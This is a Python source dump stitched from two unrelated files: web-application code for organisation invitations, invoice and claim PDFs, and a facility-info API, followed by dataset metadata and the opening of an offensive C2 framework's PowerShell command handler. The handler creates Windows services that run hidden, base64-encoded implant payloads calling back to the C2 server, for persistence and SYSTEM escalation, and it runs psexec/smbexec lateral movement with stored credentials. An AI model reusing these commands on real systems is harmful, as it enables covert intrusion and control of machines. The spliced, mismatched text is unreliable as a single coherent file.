query = ttable.id.belongs(all_types)
types = db(query).select(ttable.id,
ttable.name,
limitby = (0, len(all_types)),
)
self.type_names = {t.id: t.name for t in types}
return rows
# -------------------------------------------------------------------------
def represent_row(self, row, prefix=None):
"""
Represent a single Row
@param row: the org_organisation Row
@param prefix: the hierarchy prefix (unused here)
"""
name = s3_str(row.name)
if self.show_type:
T = current.T
type_ids = self.org_types.get(row.id)
if type_ids:
type_names = self.type_names
types = [s3_str(T(type_names[t]))
for t in type_ids if t in type_names
]
name = "%s (%s)" % (name, ", ".join(types))
return name
# =============================================================================
class ContactRepresent(pr_PersonRepresentContact):
"""
Visually enhanced version of pr_PersonRepresentContact
"""
def represent_row(self, row):
"""
Represent a row
@param row: the Row
"""
output = DIV(SPAN(s3_fullname(row),
_class = "contact-name",
),
_class = "contact-repr",
)
try:
pe_id = row.pe_id
except AttributeError:
pass
else:
if self.show_email:
email = self._email.get(pe_id)
if self.show_phone:
phone = self._phone.get(pe_id)
if email or phone:
details = DIV(_class="contact-details")
if email:
details.append(DIV(ICON("mail"),
SPAN(A(email,
_href="mailto:%s" % email,
),
_class = "contact-email"),
_class = "contact-info",
))
if phone:
details.append(DIV(ICON("phone"),
SPAN(phone,
_class = "contact-phone"),
_class = "contact-info",
))
output.append(details)
return output
# =============================================================================
class InviteUserOrg(S3Method):
""" Custom Method Handler to invite User Organisations """
# -------------------------------------------------------------------------
def apply_method(self, r, **attr):
"""
Page-render entry point for REST interface.
@param r: the S3Request instance
@param attr: controller attributes
"""
output = {}
if r.http in ("GET", "POST"):
if not r.record:
r.error(400, current.ERROR.BAD_REQUEST)
if r.interactive:
output = self.invite(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
def invite(self, r, **attr):
"""
Prepare and process invitation form
@param r: the S3Request instance
@param attr: controller attributes
"""
T = current.T
db = current.db
s3db = current.s3db
response = current.response
request = current.request
session = current.session
settings = current.deployment_settings
auth = current.auth
auth_settings = auth.settings
auth_messages = auth.messages
output = {"title": T("Invite Organisation"),
}
# Check for existing accounts
active, disabled, invited = get_org_accounts(r.record.id)
if active or disabled:
response.error = T("There are already user accounts registered for this organization")
from s3 import s3_format_fullname
fullname = lambda user: s3_format_fullname(fname = user.first_name,
lname = user.last_name,
truncate = False,
)
account_list = DIV(_class="org-account-list")
if active:
account_list.append(H4(T("Active Accounts")))
accounts = UL()
for user in active:
accounts.append(LI("%s <%s>" % (fullname(user), user.email)))
account_list.append(accounts)
if disabled:
account_list.append(H4(T("Disabled Accounts")))
accounts = UL()
for user in disabled:
accounts.append(LI("%s <%s>" % (fullname(user), user.email)))
account_list.append(accounts)
output["item"] = account_list
response.view = self._view(r, "display.html")
return output
account = invited[0] if invited else None
# Look up email to use for invitation
email = None
if account:
email = account.email
else:
ctable = s3db.pr_contact
query = (ctable.pe_id == r.record.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
contact = db(query).select(ctable.value,
orderby = ctable.priority,
limitby = (0, 1),
).first()
if contact:
email = contact.value
# Form Fields
utable = auth_settings.table_user
dbset = db(utable.id != account.id) if account else db
formfields = [Field("email",
default = email,
requires = [IS_EMAIL(error_message = auth_messages.invalid_email),
IS_LOWER(),
IS_NOT_IN_DB(dbset, "%s.email" % utable._tablename,
error_message = auth_messages.duplicate_email,
),
]
),
]
# Generate labels (and mark required fields in the process)
labels, has_required = s3_mark_required(formfields)
response.s3.has_required = has_required
# Form buttons
SEND_INVITATION = T("Send New Invitation") if account else T("Send Invitation")
buttons = [INPUT(_type = "submit",
_value = SEND_INVITATION,
),
# TODO cancel-button?
]
# Construct the form
response.form_label_separator = ""
form = SQLFORM.factory(table_name = "invite",
record = None,
hidden = {"_next": request.vars._next},
labels = labels,
separator = "",
showid = False,
submit_button = SEND_INVITATION,
#delete_label = auth_messages.delete_label,
formstyle = settings.get_ui_formstyle(),
buttons = buttons,
*formfields)
# Identify form for CSS & JS Validation
form.add_class("send_invitation")
if form.accepts(request.vars,
session,
formname = "invite",
#onvalidation = auth_settings.register_onvalidation,
):
error = self.invite_account(r.record, form.vars.email, account=account)
if error:
response.error = T("Could not send invitation (%(reason)s)") % {"reason": error}
else:
response.confirmation = T("Invitation sent")
else:
if account:
response.warning = T("This organisation has been invited before!")
output["form"] = form
response.view = self._view(r, "update.html")
return output
# -------------------------------------------------------------------------
@classmethod
def invite_account(cls, organisation, email, account=None):
request = current.request
data = {"first_name": organisation.name,
"email": email,
# TODO language => use default language
"link_user_to": ["staff"],
"organisation_id": organisation.id,
}
# Generate registration key and activation code
from uuid import uuid4
key = str(uuid4())
code = uuid4().hex[-6:].upper()
# Add hash to data
data["registration_key"] = cls.keyhash(key, code)
if account:
success = account.update_record(**data)
if not success:
return "could not update preliminary account"
else:
utable = current.auth.settings.table_user
# Catch email addresses already used in existing accounts
if current.db(utable.email == email).select(utable.id,
limitby = (0, 1),
).first():
return "email address %s already in use" % email
user_id = utable.insert(**data)
if user_id:
ltable = current.s3db.org_organisation_user
ltable.insert(organisation_id = organisation.id,
user_id = user_id,
)
else:
return "could not create preliminary account"
# Compose and send invitation email
# => must use public_url setting because URL() produces a
# localhost address when called from CLI or script
base_url = current.deployment_settings.get_base_public_url()
appname = request.application
registration_url = "%s/%s/default/index/register_invited/%s"
data = {"url": registration_url % (base_url, appname, key),
"code": code,
}
from .notifications import CMSNotifications
return CMSNotifications.send(email, "InviteOrg", data,
module = "auth",
resource = "user",
)
# -------------------------------------------------------------------------
@staticmethod
def keyhash(key, code):
"""
Generate a hash of the activation code using
the registration key
@param key: the registration key
@param code: the activation code
@returns: the hash as string
"""
crypt = CRYPT(key=key, digest_alg="sha512", salt=None)
return str(crypt(code.upper())[0])
# =============================================================================
class InvoicePDF(S3Method):
"""
REST Method to generate an invoice PDF
- for external accounting archives
"""
def apply_method(self, r, **attr):
"""
Generate a PDF of an Invoice
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.representation != "pdf":
r.error(415, current.ERROR.BAD_FORMAT)
if not r.record or r.http != "GET":
r.error(400, current.ERROR.BAD_REQUEST)
T = current.T
# Filename to include invoice number if available
invoice_no = r.record.invoice_no
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "read",
pdf_title = T("Invoice"),
pdf_filename = invoice_no if invoice_no else None,
pdf_header = self.invoice_header,
pdf_callback = self.invoice,
pdf_footer = self.invoice_footer,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_orientation = "Portrait",
pdf_table_autogrow = "B",
**attr
)
# -------------------------------------------------------------------------
@classmethod
def invoice_header(cls, r):
"""
Generate the invoice header
@param r: the S3Request
"""
T = current.T
table = r.resource.table
invoice = r.record
pdata = cls.lookup_header_data(invoice)
place = [pdata.get(k) for k in ("addr_postcode", "addr_place")]
header = TABLE(TR(TD(DIV(H4(T("Invoice")), P(" ")),
_colspan = 4,
),
),
TR(TH(T("Invoicing Party")),
TD(pdata.get("organisation", "-")),
TH(T("Invoice No.")),
TD(table.invoice_no.represent(invoice.invoice_no)),
),
TR(TH(T("Address")),
TD(pdata.get("addr_street", "-")),
TH(table.date.label),
TD(table.date.represent(invoice.date)),
),
TR(TH(T("Place")),
TD(" ".join(v for v in place if v)),
TH(T("Payers")),
TD(pdata.get("payers")),
),
TR(TH(T("Email")),
TD(pdata.get("email", "-")),
TH(T("Billing Date")),
TD(table.date.represent(pdata.get("billing_date"))),
),
)
return header
# -------------------------------------------------------------------------
@classmethod
def invoice(cls, r):
"""
Generate the invoice body
@param r: the S3Request
"""
T = current.T
table = r.table
invoice = r.record
pdata = cls.lookup_body_data(invoice)
# Lambda to format currency amounts
amt = lambda v: IS_FLOAT_AMOUNT.represent(v, precision=2, fixed=True)
currency = invoice.currency
# Specification of costs
costs = TABLE(TR(TH(T("No.")),
TH(T("Description")),
TH(T("Number##count")),
TH(T("Unit")),
TH(table.price_per_unit.label),
TH(T("Total")),
TH(table.currency.label),
),
TR(TD("1"), # only one line item here
TD(pdata.get("title", "-")),
TD(str(invoice.quantity_total)),
TD(pdata.get("unit", "-")),
TD(amt(invoice.price_per_unit)),
TD(amt(invoice.amount_receivable)),
TD(currency),
),
TR(TD(H5(T("Total")), _colspan=5),
TD(H5(amt(invoice.amount_receivable))),
TD(H5(currency)),
),
)
# Payment Details
an_field = table.account_number
an = an_field.represent(invoice.account_number)
payment_details = TABLE(TR(TH(table.account_holder.label),
TD(invoice.account_holder),
),
TR(TH(an_field.label),
TD(an),
),
TR(TH(table.bank_name.label),
TD(invoice.bank_name),
),
)
return DIV(H4(" "),
H5(T("Specification of Costs")),
costs,
H4(" "),
H4(" "),
H5(T("Payable within %(num)s days to") % {"num": 30}),
payment_details,
)
# -------------------------------------------------------------------------
@staticmethod
def invoice_footer(r):
"""
Generate the invoice footer
@param r: the S3Request
"""
T = current.T
invoice = r.record
# Details about who generated the document and when
user = current.auth.user
if not user:
username = T("anonymous user")
else:
username = s3_fullname(user)
now = S3DateTime.datetime_represent(current.request.utcnow, utc=True)
note = T("Document generated by %(user)s on %(date)s") % {"user": username,
"date": now,
}
# Details about the data source
vhash = invoice.vhash
try:
verification = vhash.split("$$")[1][:7]
except (AttributeError, IndexError):
verification = T("invalid")
settings = current.deployment_settings
source = TABLE(TR(TH(T("System Name")),
TD(settings.get_system_name()),
),
TR(TH(T("Web Address")),
TD(settings.get_base_public_url()),
),
TR(TH(T("Data Source")),
TD("%s [%s]" % (invoice.uuid, verification)),
),
)
return DIV(P(note), source)
# -------------------------------------------------------------------------
@staticmethod
def lookup_header_data(invoice):
"""
Look up data for the invoice header
@param invoice: the invoice record
@returns: dict with header data
"""
db = current.db
s3db = current.s3db
data = {}
btable = s3db.fin_voucher_billing
ptable = s3db.fin_voucher_program
otable = s3db.org_organisation
ftable = s3db.org_facility
ltable = s3db.gis_location
ctable = s3db.pr_contact
# Look up the billing date
query = (btable.id == invoice.billing_id)
billing = db(query).select(btable.date,
limitby = (0, 1),
).first()
if billing:
data["billing_date"] = billing.date
# Use the program admin org as "payers"
query = (ptable.id == invoice.program_id)
join = otable.on(otable.id == ptable.organisation_id)
admin_org = db(query).select(otable.name,
join = join,
limitby = (0, 1),
).first()
if admin_org:
data["payers"] = admin_org.name
# Look up details of the invoicing party
query = (otable.pe_id == invoice.pe_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.id,
otable.name,
limitby = (0, 1),
).first()
if organisation:
data["organisation"] = organisation.name
# Email address
query = (ctable.pe_id == invoice.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
email = db(query).select(ctable.value,
limitby = (0, 1),
).first()
if email:
data["email"] = email.value
# Facility address
query = (ftable.organisation_id == organisation.id) & \
(ftable.obsolete == False) & \
(ftable.deleted == False)
left = ltable.on(ltable.id == ftable.location_id)
facility = db(query).select(ftable.email,
ltable.addr_street,
ltable.addr_postcode,
ltable.L3,
ltable.L4,
left = left,
limitby = (0, 1),
orderby = ftable.created_on,
).first()
if facility:
if data.get("email"):
# Fallback
data["email"] = facility.org_facility.email
location = facility.gis_location
data["addr_street"] = location.addr_street or "-"
data["addr_postcode"] = location.addr_postcode or "-"
data["addr_place"] = location.L4 or location.L3 or "-"
return data
# -------------------------------------------------------------------------
@staticmethod
def lookup_body_data(invoice):
"""
Look up additional data for invoice body
@param invoice: the invoice record
@returns: dict with invoice data
"""
db = current.db
s3db = current.s3db
ptable = s3db.fin_voucher_program
query = (ptable.id == invoice.program_id) & \
(ptable.deleted == False)
program = db(query).select(ptable.id,
ptable.name,
ptable.unit,
limitby = (0, 1),
).first()
if program:
data = {"title": program.name,
"unit": program.unit,
}
else:
data = {}
return data
# =============================================================================
class ClaimPDF(S3Method):
"""
REST Method to generate a claim PDF
- for external accounting archives
"""
def apply_method(self, r, **attr):
"""
Generate a PDF of a Claim
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.representation != "pdf":
r.error(415, current.ERROR.BAD_FORMAT)
if not r.record or r.http != "GET":
r.error(400, current.ERROR.BAD_REQUEST)
T = current.T
# Filename to include invoice number if available
invoice_no = self.invoice_number(r.record)
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "read",
pdf_title = T("Compensation Claim"),
pdf_filename = invoice_no if invoice_no else None,
pdf_header = self.claim_header,
pdf_callback = self.claim,
pdf_footer = self.claim_footer,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_orientation = "Portrait",
pdf_table_autogrow = "B",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
def invoice_number(record):
invoice_id = record.invoice_id
if invoice_id:
s3db = current.s3db
itable = s3db.fin_voucher_invoice
query = (itable.id == invoice_id)
invoice = current.db(query).select(itable.invoice_no,
cache = s3db.cache,
limitby = (0, 1),
).first()
else:
invoice = None
return invoice.invoice_no if invoice else None
# -------------------------------------------------------------------------
@classmethod
def claim_header(cls, r):
"""
Generate the claim header
@param r: the S3Request
"""
T = current.T
table = r.resource.table
itable = current.s3db.fin_voucher_invoice
claim = r.record
pdata = cls.lookup_header_data(claim)
place = [pdata.get(k) for k in ("addr_postcode", "addr_place")]
status = " " if claim.invoice_id else "(%s)" % T("not invoiced yet")
header = TABLE(TR(TD(DIV(H4(T("Compensation Claim")), P(status)),
_colspan = 4,
),
),
TR(TH(T("Invoicing Party")),
TD(pdata.get("organisation", "-")),
TH(T("Invoice No.")),
TD(itable.invoice_no.represent(pdata.get("invoice_no"))),
),
TR(TH(T("Address")),
TD(pdata.get("addr_street", "-")),
TH(itable.date.label),
TD(itable.date.represent(pdata.get("invoice_date"))),
),
TR(TH(T("Place")),
TD(" ".join(v for v in place if v)),
TH(T("Payers")),
TD(pdata.get("payers")),
),
TR(TH(T("Email")),
TD(pdata.get("email", "-")),
TH(T("Billing Date")),
TD(table.date.represent(pdata.get("billing_date"))),
),
)
return header
# -------------------------------------------------------------------------
@classmethod
def claim(cls, r):
"""
Generate the claim body
@param r: the S3Request
"""
T = current.T
table = r.table
claim = r.record
pdata = cls.lookup_body_data(claim)
# Lambda to format currency amounts
amt = lambda v: IS_FLOAT_AMOUNT.represent(v, precision=2, fixed=True)
currency = claim.currency
# Specification of costs
costs = TABLE(TR(TH(T("No.")),
TH(T("Description")),
TH(T("Number##count")),
TH(T("Unit")),
TH(table.price_per_unit.label),
TH(T("Total")),
TH(table.currency.label),
),
TR(TD("1"), # only one line item here
TD(pdata.get("title", "-")),
TD(str(claim.quantity_total)),
TD(pdata.get("unit", "-")),
TD(amt(claim.price_per_unit)),
TD(amt(claim.amount_receivable)),
TD(currency),
),
TR(TD(H5(T("Total")), _colspan=5),
TD(H5(amt(claim.amount_receivable))),
TD(H5(currency)),
),
)
# Payment Details
an_field = table.account_number
an = an_field.represent(claim.account_number)
payment_details = TABLE(TR(TH(table.account_holder.label),
TD(claim.account_holder),
),
TR(TH(an_field.label),
TD(an),
),
TR(TH(table.bank_name.label),
TD(claim.bank_name),
),
)
return DIV(H4(" "),
H5(T("Specification of Costs")),
costs,
H4(" "),
H4(" "),
H5(T("Payable within %(num)s days to") % {"num": 30}),
payment_details,
)
# -------------------------------------------------------------------------
@staticmethod
def claim_footer(r):
"""
Generate the claim footer
@param r: the S3Request
"""
T = current.T
claim = r.record
# Details about who generated the document and when
user = current.auth.user
if not user:
username = T("anonymous user")
else:
username = s3_fullname(user)
now = S3DateTime.datetime_represent(current.request.utcnow, utc=True)
note = T("Document generated by %(user)s on %(date)s") % {"user": username,
"date": now,
}
# Details about the data source
vhash = claim.vhash
try:
verification = vhash.split("$$")[1][:7]
except (AttributeError, IndexError):
verification = T("invalid")
settings = current.deployment_settings
source = TABLE(TR(TH(T("System Name")),
TD(settings.get_system_name()),
),
TR(TH(T("Web Address")),
TD(settings.get_base_public_url()),
),
TR(TH(T("Data Source")),
TD("%s [%s]" % (claim.uuid, verification)),
),
)
return DIV(P(note), source)
# -------------------------------------------------------------------------
@staticmethod
def lookup_header_data(claim):
"""
Look up data for the claim header
@param claim: the claim record
@returns: dict with header data
"""
db = current.db
s3db = current.s3db
data = {}
btable = s3db.fin_voucher_billing
itable = s3db.fin_voucher_invoice
ptable = s3db.fin_voucher_program
otable = s3db.org_organisation
ftable = s3db.org_facility
ltable = s3db.gis_location
ctable = s3db.pr_contact
# Look up the billing date
query = (btable.id == claim.billing_id)
billing = db(query).select(btable.date,
limitby = (0, 1),
).first()
if billing:
data["billing_date"] = billing.date
# Look up invoice details
if claim.invoice_id:
query = (itable.id == claim.invoice_id)
invoice = db(query).select(itable.date,
itable.invoice_no,
limitby = (0, 1),
).first()
if invoice:
data["invoice_no"] = invoice.invoice_no
data["invoice_date"] = invoice.date
# Use the program admin org as "payers"
query = (ptable.id == claim.program_id)
join = otable.on(otable.id == ptable.organisation_id)
admin_org = db(query).select(otable.name,
join = join,
limitby = (0, 1),
).first()
if admin_org:
data["payers"] = admin_org.name
# Look up details of the invoicing party
query = (otable.pe_id == claim.pe_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.id,
otable.name,
limitby = (0, 1),
).first()
if organisation:
data["organisation"] = organisation.name
# Email address
query = (ctable.pe_id == claim.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
email = db(query).select(ctable.value,
limitby = (0, 1),
).first()
if email:
data["email"] = email.value
# Facility address
query = (ftable.organisation_id == organisation.id) & \
(ftable.obsolete == False) & \
(ftable.deleted == False)
left = ltable.on(ltable.id == ftable.location_id)
facility = db(query).select(ftable.email,
ltable.addr_street,
ltable.addr_postcode,
ltable.L3,
ltable.L4,
left = left,
limitby = (0, 1),
orderby = ftable.created_on,
).first()
if facility:
if data.get("email"):
# Fallback
data["email"] = facility.org_facility.email
location = facility.gis_location
data["addr_street"] = location.addr_street or "-"
data["addr_postcode"] = location.addr_postcode or "-"
data["addr_place"] = location.L4 or location.L3 or "-"
return data
# -------------------------------------------------------------------------
@staticmethod
def lookup_body_data(claim):
"""
Look up additional data for claim body
@param claim: the claim record
@returns: dict with claim data
"""
db = current.db
s3db = current.s3db
ptable = s3db.fin_voucher_program
query = (ptable.id == claim.program_id) & \
(ptable.deleted == False)
program = db(query).select(ptable.id,
ptable.name,
ptable.unit,
limitby = (0, 1),
).first()
if program:
data = {"title": program.name,
"unit": program.unit,
}
else:
data = {}
return data
# =============================================================================
class TestFacilityInfo(S3Method):
"""
REST Method to report details/activities of a test facility
"""
def apply_method(self, r, **attr):
"""
Report test facility information
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.http == "POST":
if r.representation == "json":
output = self.facility_info(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
@staticmethod
def facility_info(r, **attr):
"""
Respond to a POST .json request, request body format:
{"client": "CLIENT", - the client identity (ocert)
"appkey": "APPKEY", - the client app key (ocert)
"code": "FACILITY-CODE", - the facility code
"report": ["start","end"], - the date interval to report
activities for (optional)
(ISO-format dates YYYY-MM-DD)
}
Output format:
{"code": "FACILITY-CODE", - echoed from input
"name": "FACILITY-NAME", - the facility name
"phone": "phone #", - the facility phone number
"email": "email", - the facility email address
"organisation":
{"name": "ORG-NAME", - the organisation name
"type": "ORG-TYPE", - the organisation type
"website": "URL" - the organisation website URL
},
"location":
{"L1": "L1-NAME", - the L1 name (state)
"L2": "L2-NAME", - the L2 name (district)
"L3": "L3-NAME", - the L3 name (commune/city)
"L4": "L4-NAME", - the L4 name (village/town)
"address": "STREET", - the street address
"postcode": "XXXXX" - the postcode
},
"report": ["start","end"], - echoed from input, ISO-format dates YYYY-MM-DD
"activity":
{"tests":59 - the total number of tests reported for the period
}
}
"""
settings = current.deployment_settings
# Get the configured, permitted clients
ocert = settings.get_custom("ocert")
if not ocert:
r.error(501, current.ERROR.METHOD_DISABLED)
# Read the body JSON of the request
body = r.body
body.seek(0)
try:
s = body.read().decode("utf-8")
except (ValueError, AttributeError, UnicodeDecodeError):
r.error(400, current.ERROR.BAD_REQUEST)
try:
ref = json.loads(s)
except JSONERRORS:
r.error(400, current.ERROR.BAD_REQUEST)
# Verify the client
client = ref.get("client")
if not client or client not in ocert:
r.error(403, current.ERROR.NOT_PERMITTED)
key, _ = ocert.get(client)
if key:
appkey = ref.get("appkey")
if not appkey or appkey.upper() != key.upper():
r.error(403, current.ERROR.NOT_PERMITTED)
# Identify the facility
db = current.db
s3db = current.s3db
table = s3db.org_facility
record = r.record
if record:
query = (table.id == record.id)
else:
code = ref.get("code")
if not code:
r.error(400, current.ERROR.BAD_REQUEST)
query = (table.code.upper() == code.upper())
query &= (table.deleted == False)
facility = db(query).select(table.code,
table.name,
table.phone1,
table.email,
table.website,
table.organisation_id,
table.location_id,
table.site_id,
limitby = (0, 1),
).first()
if not facility:
r.error(404, current.ERROR.BAD_RECORD)
# Prepare facility info
output = {"code": facility.code,
"name": facility.name,
"phone": facility.phone1,
"email": facility.email,
}
# Look up organisation data
otable = s3db.org_organisation
ttable = s3db.org_organisation_type
ltable = s3db.org_organisation_organisation_type
left = [ttable.on((ltable.organisation_id == otable.id) & \
(ltable.deleted == False) & \
(ttable.id == ltable.organisation_type_id)),
]
query = (otable.id == facility.organisation_id) & \
(otable.deleted == False)
row = db(query).select(otable.name,
otable.website,
ttable.name,
left = left,
limitby = (0, 1),
).first()
if row:
organisation = row.org_organisation
orgtype = row.org_organisation_type
orgdata = {"name": organisation.name,
"type": orgtype.name,
"website": organisation.website,
}
output["organisation"] = orgdata
# Look up location data
ltable = s3db.gis_location
query = (ltable.id == facility.location_id) & \
(ltable.deleted == False)
row = db(query).select(ltable.L1,
ltable.L2,
ltable.L3,
ltable.L4,
ltable.addr_street,
ltable.addr_postcode,
limitby = (0, 1),
).first()
if row:
locdata = {"L1": row.L1,
"L2": row.L2,
"L3": row.L3,
"L4": row.L4,
"address": row.addr_street,
"postcode": row.addr_postcode,
}
output["location"] = locdata
# Look up activity data
report = ref.get("report")
if isinstance(report, list) and len(report) == 2:
parse_date = current.calendar.parse_date
start, end = parse_date(s3_str(report[0])), \
parse_date(s3_str(report[1]))
if start and end:
if start > end:
start, end = end, start
table = s3db.disease_testing_report
query = (table.site_id == facility.site_id) & \
(table.date >= start) & \
(table.date <= end) & \
(table.deleted == False)
total = table.tests_total.sum()
row = db(query).select(total).first()
tests_total = row[total]
if not tests_total:
tests_total = 0
output["report"] = [start.isoformat(), end.isoformat()]
output["activity"] = {"tests": tests_total}
else:
r.error(400, "Invalid date format in report parameter")
else:
r.error(400, "Invalid report parameter format")
# Return as JSON
response = current.response
if response:
response.headers["Content-Type"] = "application/json; charset=utf-8"
return json.dumps(output, separators=(",", ":"), ensure_ascii=False)
# END =========================================================================
| 35.624085
| 100
| 0.464814
|
ca5eb1a819bdf28fdc5cb54fe4883800ea5e8c8d
| 39,327
|
py
|
Python
|
PSHandler.py
|
l0gan/PoshC2
|
1012ff5684e9a0f7811bf76fd04f43ccd7649e3a
|
[
"BSD-3-Clause"
] | 1
|
2020-06-27T00:34:07.000Z
|
2020-06-27T00:34:07.000Z
|
PSHandler.py
|
TheWover/PoshC2
|
ef33808a3f0c4473a4a238518551997463e31e53
|
[
"BSD-3-Clause"
] | null | null | null |
PSHandler.py
|
TheWover/PoshC2
|
ef33808a3f0c4473a4a238518551997463e31e53
|
[
"BSD-3-Clause"
] | null | null | null |
import base64, re, traceback, os, sys
from Alias import ps_alias
from Colours import Colours
from Utils import validate_sleep_time
from DB import new_task, update_sleep, get_history, select_item, update_label, unhide_implant, kill_implant, get_implantdetails, get_c2server_all, get_newimplanturl, get_allurls, get_sharpurls, get_cred_by_id, new_c2_message
from AutoLoads import check_module_loaded, run_autoloads
from Help import posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6, posh_help7, posh_help8
from Config import PayloadsDirectory, POSHDIR, ROOTDIR, SocksHost
from Core import get_creds_from_params
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from CommandPromptCompleter import FilePathCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload, implant_id, commandloop):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print("Error loading Stage2-Core.ps1: %s" % e)
# alias mapping
for alias in ps_alias:
if command.startswith(alias[0]):
command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
# opsec failures
for opsec in ps_opsec:
if opsec == command[:len(opsec)]:
print(Colours.RED)
print("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
break
if command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"):
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '').strip()
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
else:
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif command.startswith("unhook-amsi"):
new_task("unhook", user, randomuri)
elif command.startswith("searchhelp"):
searchterm = (command).replace("searchhelp ", "")
helpful = posh_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
elif (command == "back") or (command == "clear"):
startup(user)
elif command == "download-files":
print(Colours.RED + "Please enter a full path to the directory" + Colours.GREEN)
startup(user)
elif command.startswith("install-servicelevel-persistencewithproxy"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif command.startswith("install-servicelevel-persistence"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif command.startswith("remove-servicelevel-persistence"):
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif command.startswith("get-implantworkingdirectory"):
new_task("pwd", user, randomuri)
elif command.startswith("get-system-withproxy"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command.startswith("get-system-withdaisy"):
C2 = get_c2server_all()
daisyname = input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command.startswith("get-system"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command == "quit":
ri = input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
if ri == "" or ri.lower() == "y":
new_c2_message("%s logged off." % user)
sys.exit(0)
elif command.startswith("invoke-psexec ") or command.startswith("invoke-smbexec "):
check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
params = re.compile("invoke-smbexec |invoke-psexec ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-smbexec %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-psexecproxypayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
